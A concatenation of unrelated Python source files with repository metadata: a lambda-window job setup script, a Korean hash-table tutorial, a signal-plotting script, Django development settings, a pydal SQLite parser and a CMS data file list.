lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
for j in lambd:
os.chdir("%6.5f" %(j))
workdir = dir + "%6.5f" %(j) + '/'
#prodin
prodin = workdir + "%6.5f_prod_5.in" %(j)
os.system("cp %s %s" %(temp_prodin, prodin))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, prodin))
#PBS
pbs = workdir + "%6.5f_5.pbs" %(j)
os.system("cp %s %s" %(temp_pbs, pbs))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
#submit pbs
#os.system("qsub %s" %(pbs))
os.chdir(dir)
| [
"songlin3@msu.edu"
] | songlin3@msu.edu |
53735cbef4d7f81e2d0940a29b398aa16adfcbe7 | 11f51735176e90f522db8d8250fcac4e28d03367 | /python_basic/ds-10.py | 2ea8e0d6259f9855dacc0e5aa76b02dfacedd5b7 | [] | no_license | schw240/Fastcampus_secondtest | 6d253c9d8e360e0f7c8927c902747981f452bbb6 | d89dc6d7dd031266abc6c0b51e51761c940123a4 | refs/heads/main | 2023-03-21T04:21:21.515959 | 2021-03-09T12:46:07 | 2021-03-09T12:46:07 | 340,637,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,220 | py | # 해쉬 테이블
# A data structure that stores data under keys.
# Python's dict is already implemented as a hash table, so no separate
# implementation is needed; this builds a simple one for illustration.
hash_table = list([0 for i in range(10)])
#print(hash_table)
# A simple hash function using the Division method (the remainder of an
# integer division picks the slot).
def hash_func(key, buckets=5):
    """Map *key* to a slot index via ``key % buckets``.

    ``buckets`` defaults to 5 to preserve the original behavior, but can
    now be overridden (e.g. to 10 to actually use every slot of the
    10-element ``hash_table`` defined above).
    """
    return key % buckets
# Try storing values in the hash table.
# Define how keys are derived from the data, as needed per data set.
data1 = "Andy"
data2 = "Dave"
data3 = "Trump"
# ord(): returns the ASCII code of a character
print(ord(data1[0]), ord(data2[0]), ord(data3[0]))
print(ord(data1[0]), hash_func(ord(data1[0])))
# Example of storing a value in the hash table: given data and a value,
# derive the key from the data, hash it, and store the value at the
# resulting slot.
def storage_data(data, value):
    """Store *value* in the slot addressed by hashing *data*'s first char."""
    slot = hash_func(ord(data[0]))
    hash_table[slot] = value
# Store real data and read it back.
def get_data(data):
    """Return the value stored at the slot addressed by *data*'s first char."""
    slot = hash_func(ord(data[0]))
    return hash_table[slot]
| [
"schw240@gmail.com"
] | schw240@gmail.com |
112511cf83912aae4b88c376b5789ef936473501 | ae4d4087fd03511be038e4c2c8959a2f64f79198 | /doc/misc_plots/nonstationary_phase_plot.py | 2afaa337fe8f888d113810f179aa0a4eeb82ef33 | [] | no_license | jaidevd/pytftb | 88a6a829bd9bf83dc358604f9463189b75513542 | daa5a171ac0d53af0b81c1afd1267f8016bb8fc4 | refs/heads/master | 2021-07-16T18:50:44.302042 | 2021-06-28T06:26:03 | 2021-06-28T06:26:03 | 25,037,207 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | from tftb.generators import fmlin, amgauss
import numpy as np
import matplotlib.pyplot as plt
# Linear-FM chirp with a Gaussian amplitude envelope.  fmlin() already
# returns an analytic signal, so no Hilbert transform is needed.
signal, _ = fmlin(2048)
signal = signal * amgauss(2048)
# Trace the signal in the complex plane.
plt.plot(np.real(signal), np.imag(signal))
plt.xlabel("Real part")
plt.ylabel("Imaginary part")
plt.show()
| [
"deshpande.jaidev@gmail.com"
] | deshpande.jaidev@gmail.com |
d2037a1236a4acc57abdf3ddd0792e134f3e7ba6 | 3ea1a45f61932ae0e8b504beb137be2a7c303d06 | /例子-0819-05.函数的返回值.py | 25edb9a4351c71de01443432766084d826f064f0 | [] | no_license | blackplusy/0810 | 8e650f7ce0e5d93b30e266bc7eef13491e588881 | e91290a1b0bea9966a85808935837f9af861f86f | refs/heads/master | 2022-12-14T11:12:27.585683 | 2020-09-05T08:29:49 | 2020-09-05T08:29:49 | 286,350,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | #coding=utf-8
#1.一个返回值
#定义sum函数,需要传入2个参数
def sum(a,b):
#业务逻辑,相加
jisuan=a+b
#返回计算结果
return jisuan
#通过变量接收函数操作后的结果,注意,一定要传入2个参数
a=sum(20,30)
print(a)
#2.多个返回值
def ret(a,b):
a*=10
b*=100
return a,b
num=ret(3,7)
print(num)
print(type(num))
num1,num2=ret(10,20)
print(num1,num2)
| [
"noreply@github.com"
] | blackplusy.noreply@github.com |
c7d15d2d77af850d7e49a03f2d46dbb68ed9f81a | fa8011b6942cac7b23d2dc781f7ae16d2cfab7f2 | /gravoicy/config/settings_local.py | 554622a9e704c6cbfa4d4071777e3fd73ca0964f | [] | no_license | indexofire/gravoicy | be99ae4995e81bf823841857742e60d689f20b1b | a516af5ec67e720ea2f1f695f28afadfb938cff4 | refs/heads/master | 2020-05-18T12:53:55.020633 | 2011-03-24T15:07:05 | 2011-03-24T15:07:05 | 948,414 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,569 | py | # -*- coding: utf-8 -*-
import os
from settings import PROJECT_PATH
from config.settings_base import *
# Local development settings -- overrides settings_base.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
# NOTE(review): secret key committed in source control -- rotate before any
# non-local deployment.
SECRET_KEY = '1F=(lta=1R9je3ze@g#fa^m#hJu^mv%@8+%fZ5p)*1$(*tvbh6'
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': '../../grav_data.db',
        'OPTIONS': {
            'timeout': 10,
        }
    }
}
FEINCMS_ADMIN_MEDIA = '/media/feincms/'
TIME_ZONE = 'Asia/Shanghai'
LANGUAGE_CODE = 'zh-cn'
# IPs for which debug_toolbar is shown.
INTERNAL_IPS = (
    '127.0.0.1',
)
MIDDLEWARE_CLASSES += (
    'pagination.middleware.PaginationMiddleware',
    'debug_toolbar.middleware.DebugToolbarMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS += (
    'forum.context_processors.page_size',
)
INSTALLED_APPS += (
    'registration',
    'base',
    #'taggit',
    #'voting',
    #'blog',
    'forum',
    #'cms',
    #'wiki',
    'debug_toolbar',
    #'redis_sessions',
    'feincms',
    'feincms.module.page',
    'feincms.module.medialibrary',
    'mptt',
    'attachment',
    #'simpleavatar',
    'avatar',
    #'userprofile',
    'pagination',
    'notification',
    'content_ext.googlemap',
    'account',
    # 'registration' was listed a second time here; duplicate app labels in
    # INSTALLED_APPS are invalid (Django rejects them / loads the app twice).
    'categories',
    'editor',
)
FEINCMS_TREE_EDITOR_INCLUDE_ANCESTORS = True
#SESSION_ENGINE = 'utils.sessions.backends.redis'
# Display/pagination configuration consumed by forum.context_processors.
FORUM_CTX_CONFIG = {
    'FORUM_TITLE': 'HZCDCLabs Forum',
    'FORUM_SUB_TITLE': '',
    'FORUM_PAGE_SIZE': 50,
    'TOPIC_PAGE_SIZE': 2,
}
SITE_NAME = 'HZCDC'
SITE_SUB_NAME = 'Labs'
MARKUP_CODE_HIGHTLIGHT = True
MARKITUP_JS_URL = '/media/markitup/sets/default/set.js'
| [
"indexofire@gmail.com"
] | indexofire@gmail.com |
5a9db80ab7d58772f4e96ff0ac9215bcd6c3eaf3 | fbe1718ba12e41d45524fa2966087d9f24ae18c3 | /pydal/parsers/sqlite.py | ea2331cc4617cd10dbe4fde350160cc02b923d21 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | michele-comitini/pydal | b5ab988c7ce1ea149128bc70d9f133700f7a0de3 | b6cd09a8bb1c3a27cdcd02297453f74d4380e79c | refs/heads/master | 2020-12-25T05:07:52.401623 | 2016-05-26T02:17:01 | 2016-05-26T02:17:01 | 30,265,122 | 0 | 0 | null | 2015-02-03T21:19:56 | 2015-02-03T21:19:55 | Python | UTF-8 | Python | false | false | 531 | py | from decimal import Decimal
from ..adapters.sqlite import SQLite
from .base import ListsParser, TimeParser, JSONParser
from . import parsers, for_type, before_parse
@parsers.register_for(SQLite)
class SQLiteParser(ListsParser, TimeParser, JSONParser):
    """Row-value parsers registered for the SQLite adapter."""

    @before_parse('decimal')
    def decimal_extras(self, field_type):
        # field_type looks like "decimal(m,n)": slice off the prefix and the
        # closing paren, then keep the scale (digits after the comma).
        scale = field_type[8:-1].split(',')[-1]
        return {'decimals': scale}

    @for_type('decimal')
    def _decimal(self, value, decimals):
        # Render with the declared scale before converting, so the Decimal
        # carries exactly `decimals` fractional digits.
        formatted = ('%.' + decimals + 'f') % value
        return Decimal(formatted)
| [
"giovanni.barillari@gmail.com"
] | giovanni.barillari@gmail.com |
3c42be0f8099c9e7b8595aa69bbb9c8e1050e189 | 56f5b2ea36a2258b8ca21e2a3af9a5c7a9df3c6e | /CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467501/source_cfg.py | 87300ec1ff28def220494de84293ca0458b2af1f | [] | no_license | rmanzoni/HTT | 18e6b583f04c0a6ca10142d9da3dd4c850cddabc | a03b227073b2d4d8a2abe95367c014694588bf98 | refs/heads/master | 2016-09-06T05:55:52.602604 | 2014-02-20T16:35:34 | 2014-02-20T16:35:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,447 | py | ###SourceCFG: 98 GoodFiles; 0 BadFiles found in mask; Input prescale factor 1
files = ['/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_100_1_15n.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_101_1_83P.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_10_1_a2q.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_11_1_SXo.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_12_1_6B1.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_13_1_feX.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_14_1_EOd.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_15_1_M3y.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_16_1_o9V.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_17_1_eDW.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_18_1_yfs.root', 
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_19_1_pir.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_1_1_y4X.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_20_1_7Eb.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_21_1_VKf.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_22_1_cEp.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_23_1_bAp.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_24_1_oTC.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_25_1_Mg7.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_26_1_I2b.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_27_1_0E7.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_28_1_AvB.root', 
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_29_1_cZa.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_2_1_HBK.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_30_1_6wT.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_31_1_kis.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_32_1_x61.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_33_1_wgG.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_34_1_UDJ.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_35_1_o04.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_36_1_szk.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_37_1_qUo.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_38_1_UTW.root', 
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_39_1_UIH.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_40_1_JRe.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_41_1_ESu.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_42_1_asF.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_43_1_DIl.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_44_1_mI2.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_45_1_9cM.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_46_1_wuR.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_47_1_JO0.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_48_1_rZn.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_49_1_oSN.root', 
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_4_1_Vg8.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_50_1_q60.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_51_1_DkE.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_52_1_N5W.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_53_1_VrQ.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_54_1_02Y.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_55_1_NZ9.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_56_1_VVI.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_57_1_eWw.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_5_1_n6u.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_60_1_ABO.root', 
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_61_1_R0y.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_62_1_QAd.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_63_1_yQj.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_64_1_mYU.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_65_1_QR9.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_66_1_9mk.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_67_1_ze6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_68_1_qrp.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_69_1_cK3.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_6_1_WRM.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_70_1_vSk.root', 
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_71_1_5eV.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_72_1_qab.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_73_1_q2C.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_74_1_Y8p.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_75_1_849.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_76_1_HyR.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_77_1_j8w.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_78_1_Ep3.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_79_1_3Iy.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_7_1_6q6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_80_1_9bK.root', 
'/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_81_1_Xml.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_82_1_4f6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_83_1_7Kh.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_84_1_w5d.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_85_1_3K6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_86_1_hjZ.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_87_1_HvD.root', 